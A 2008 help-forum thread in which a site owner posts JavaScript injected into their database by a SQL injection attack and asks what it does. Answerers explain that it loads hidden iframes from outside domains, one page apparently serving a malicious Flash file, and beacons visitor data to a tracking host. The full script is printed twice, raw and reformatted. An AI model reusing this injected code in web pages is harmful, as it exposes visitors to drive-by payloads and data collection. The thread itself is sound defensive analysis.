Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
3
912 Views
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded th .js and it is as follows:

document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



window.onerror=function(){return true};
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
0
Comment
Question by:samic400
  • 2
3 Comments
 
LVL 6

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess that this an attempt to circumvent sites that publish user inputs like blogs and feedbacks.
0
 
LVL 3

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks you pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. Then it is printed in disguise of a utility, sending the collected information and identity to the data collector at web.51.la.
The code itself is not harmful, but it could reveal something unwanted.
I have reformatted the code to see the structure easier.

Best regards
Nils


document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 

if (navigator.systemLanguage=='zh-cn')

{
 

}

else{

document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");

}
 

window.onerror=function(){return true};

document.write ('

	<script>

		var a3327tf="51la";

		var a3327pu="";

		var a3327pf="51la";

		var a3327su=window.location;

		var a3327sf=document.referrer;

		var a3327of="";

		var a3327op="";

		var a3327ops=1;

		var a3327ot=1;

		var a3327d=new Date();

		var a3327color="";

		if (navigator.appName=="Netscape")

			     {a3327color=screen.pixelDepth;} 

			else {a3327color=screen.colorDepth;}

	<\/script>

	<script>

		a3327tf=top.document.referrer;

	<\/script>

	<script>

		a3327pu =window.parent.location;

	<\/script>

	<script>

		a3327pf=window.parent.document.referrer;

	<\/script>

	<script>

		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));

		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);

		var a3327oe =new Date();

		a3327oe.setTime(a3327oe.getTime()+60*60*1000);

		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";

			path=/;

			expires="+a3327oe.toGMTString();

		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));

		if (a3327ot==null)

			     {a3327ot=1;}

			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}

		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);

		document.cookie="AJSTAT_ok_times="+a3327ot+";

			path=/;

			expires="+a3327oe.toGMTString();

	<\/script>

	<script>

		a3327of=a3327sf;

		if (a3327pf!=="51la")

			     {a3327of=a3327pf;}

		if(a3327tf!=="51la")

			     {a3327of=a3327tf;}

		a3327op=a3327pu;

		try{lainframe}catch(e){a3327op=a3327su;}

		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'

			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'

			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');

	<\/script>');

Open in new window

0
 
LVL 3

Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808
0

Featured Post

Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Jquey and footrable 2 35
angular2 2 way binding on load 7 39
how would you interpret lines 3 29
How to generate a JSON response in coldfusion 4 18
This article shows how to create and access 2-dimensional arrays in JavaScript.  It includes a tutorial in case you are just trying to "get your head wrapped around" the concept and we'll also look at some useful tips for more advanced programmers. …
JavaScript can be used in a browser to change parts of a webpage dynamically. It begins with the following pattern: If condition W is true, do thing X to target Y after event Z. Below are some tips and tricks to help you get started with JavaScript …
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

911 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

16 Experts available now in Live!

Get 1:1 Help Now